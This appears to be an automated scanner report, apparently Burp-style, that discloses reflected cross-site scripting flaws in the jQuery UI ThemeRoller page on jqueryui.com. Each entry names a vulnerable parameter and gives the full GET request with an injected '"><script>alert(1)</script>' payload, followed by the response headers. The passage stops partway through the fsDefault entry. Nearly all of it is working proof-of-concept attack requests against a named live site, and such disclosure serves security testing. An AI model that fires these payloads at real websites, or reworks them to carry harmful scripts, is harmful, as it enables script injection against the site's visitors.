The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b3c6"><script>alert(1)</script>fbf0392ad7e was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e5b3c6"><script>alert(1)</script>fbf0392ad7e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3bc9"><script>alert(1)</script>0a3d7e23c38 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7e3bc9"><script>alert(1)</script>0a3d7e23c38&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b897e"><script>alert(1)</script>ffc301760e9 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5pxb897e"><script>alert(1)</script>ffc301760e9&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62820"><script>alert(1)</script>cb7327678f9 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px62820"><script>alert(1)</script>cb7327678f9 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bcb5"><script>alert(1)</script>11892851d8d was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e170099bcb5"><script>alert(1)</script>11892851d8d&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8019d"><script>alert(1)</script>93ec095a1b8 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=2222228019d"><script>alert(1)</script>93ec095a1b8&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a64"><script>alert(1)</script>d6e8cc4be07 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e59a64"><script>alert(1)</script>d6e8cc4be07&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1cbd"><script>alert(1)</script>c9eff2d2687 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0ac1cbd"><script>alert(1)</script>c9eff2d2687&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52361"><script>alert(1)</script>1f81954189a was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff52361"><script>alert(1)</script>1f81954189a&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87309"><script>alert(1)</script>45cc4a066c2 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=36363687309"><script>alert(1)</script>45cc4a066c2&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4380f"><script>alert(1)</script>962bd0de158 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d59874380f"><script>alert(1)</script>962bd0de158&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1d1e"><script>alert(1)</script>6798d84993f was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serifc1d1e"><script>alert(1)</script>6798d84993f&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d06c"><script>alert(1)</script>c2aa43a121c was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
